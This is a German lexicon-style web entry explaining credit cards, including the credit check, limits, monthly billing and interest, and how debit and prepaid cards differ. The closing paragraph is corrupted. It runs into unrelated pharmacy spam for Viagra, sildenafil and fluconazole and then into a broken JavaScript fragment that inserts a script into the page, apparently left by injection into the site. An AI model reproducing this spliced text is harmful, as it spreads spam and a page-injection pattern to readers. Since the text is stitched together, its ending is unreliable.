Kreditkarte

Eine Kreditkarte ist ein Zahlungsinstrument, dass in der zweiten Hälfte des 20. Jahrhunderts entstand und heute zum bargeldlosen Zahlungsverkehr weltweit eingesetzt wird. Mit der Kreditkarte können Waren und Dienstleistungen gekauft werden und man kann sie dazu benutzen, Rechnungen aller Art zu begleichen. Auch bei Bezahlungen für Käufe online spielen Kreditkarten heute eine wichtige Rolle, da sie eine einfache Zahlungsweise darstellen.

Die Kreditkarten kann man auf zwei verschiedenen Weisen erhalten. Einige können über die Bank beantragt werden, während man andere direkt bei der Kreditkartengesellschaft erhalten kann. In der Regel erfolgt nach der Beantragung der Kreditkarte zunächst eine Überprüfung der Bonität, welche eine Schufa Anfrage einschließt. Wird der Kreditkartenantrag bewilligt, so steht dem Kunden ein Kredit bis zu einem festgesetzten Limit zur Verfügung. Dieses richtet sich hauptsächlich nach den monatlichen Einnahmen des Kunden und kann gegebenenfalls auch mit der Zeit erhöht werden. Innerhalb dieses Limits kann nun der Kunde mit der Kreditkarte Einkäufe und Zahlungen tätigen. Zu einem festgesetzten monatlichen Stichtag werden die im Monat angefallenen Rechnungen abgerechnet und dem Kunden in Rechnung gestellt. Der Kunde hat nun die Möglichkeit, den vollen Betrag zu zahlen oder auch nur einen Teilbetrag zu begleichen. Die Restschuld wird dann verzinst.

Trotz der relativ hohen Zinsen ist diese flexible Zahlungsmethode heute sehr beliebt. Sie ermöglicht es, beim Einkauf von besonderen Angeboten zu profitieren, auch wenn man in diesem Moment kein Bargeld zur Verfügung hat, oder auch eine größere Anschaffung zu machen, die man dann monatlich bezahlt.

Außer der echten Kreditkarte gibt es auch Prepaid Karten und Debitkarten, die umgangssprachlich auch Kreditkarten genannt werden. Ihre Funktionweise ist jedoch anders. Die Debitkarten werden in Zusammenhang mit einem Konto von der Bank ausgestellt. Mit den Karten kann man über den Geldbetrag verfügen, den man auf dem Konto hat. Sie kann, genau wie die echte Kreditkarte, zu jeder Art von Zahlungen benutzt werden und man kann auch Geld vom Geldautomaten erhalten. Der Betrag, den man ausgibt, wird sofort vom Konto abgebucht. Ist das vorhandene Guthaben auf dem Konto erschöpft, kann die Debitkarte nicht weiter benutzt werden.

Die Prepaid Karte funktioniert in ähnlicher Weise, wie die Debitkarte. Hier zahlt man ein bestimmtes Guthaben ein, über dass man dann wie bei einer Kreditkarte verfügen kann, bis der Betrag aufgebraucht ist. Die Prepaid Card eignet sich besonders für junge Leute mit geringen und unregelmäßigem Einkommen, sowohl als auch für alle, die wegen einer negativen Schufa keine echte Kreditkarte erhalten können. Sildenafil citrate order Fluconazole cheap Viagra online document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) {

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.